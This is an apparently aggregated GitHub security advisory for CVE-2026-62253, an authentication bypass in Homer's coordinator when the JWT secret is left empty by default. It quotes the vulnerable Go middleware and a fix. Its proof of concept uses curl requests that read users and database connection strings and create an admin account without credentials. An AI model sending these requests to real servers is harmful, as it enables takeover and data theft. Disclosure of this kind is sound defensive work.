OFFLINE
Awaiting data
Security intelligence
CriticalCritical vulnerability

CVE-2026-62253: Homer: Complete Authentication Bypass When coordinator.jwt.secret Is Empty (Default)

GitHub Advisories · officialPublished Oct 7, 2026Risk 50/100

### Summary Both JWT middleware functions (`JWTMiddleware` and `JWTMiddlewareV4`) immediately return `next(c)` when `jwtSecret == ""`. The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under `/api/v1`, `/api/v3`, and `/api/v4` are completely unauthenticated. ### Details **`coordinator/handlers/auth.go` lines 298-304:** ```go func (h *Auth) JWTMiddleware() echo.MiddlewareFunc { return func(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { if h.jwtSecret == "" { return next(c) // bypass — no validation performed } ``` **`coordinator/handlers/auth_v4_helpers.go` lines 177-182:** ```go func (h *Auth) JWTMiddlewareV4() echo.MiddlewareFunc { return func(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { if h.jwtSecret == "" { return next(c) // same bypass ``` **`coordinator/coordinator.go` lines 315-317:** ```go if c.config.JWT.Secret != "" { protected.Use(authHandler.JWTMiddleware()) // middleware not even registered when secret is empty } ``` **`config/config.go` line 845:** `Secret` field struct tag has `default:""`. The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty. ### PoC ```bash # On a default Homer installation (no JWT secret configured), all protected routes are open: curl http://<homer-host>/api/v3/users # Returns full user list with no credentials curl http://<homer-host>/api/v3/databases # Returns all database connection strings curl -X POST http://<homer-host>/api/v3/users \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}' # Creates a new admin user with no credentials ``` ### Impact Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data. ### Fix Fail closed: if `JWT.Secret` is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions: ```go if h.jwtSecret == "" { log.Fatal("coordinator.jwt.secret must be set to a non-empty value") } ``` If possible, please apply for a CVE number when posting.

Upgrade affected packages to a patched version: github.com/sipcapture/homer-app 0.0.0-20260625093330-5e90809657c9.

Vendor
Not specified
Product
github.com/sipcapture/homer-app
Exploitation
none known
Evidence
official
CVSS
9.8

This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.

Open primary source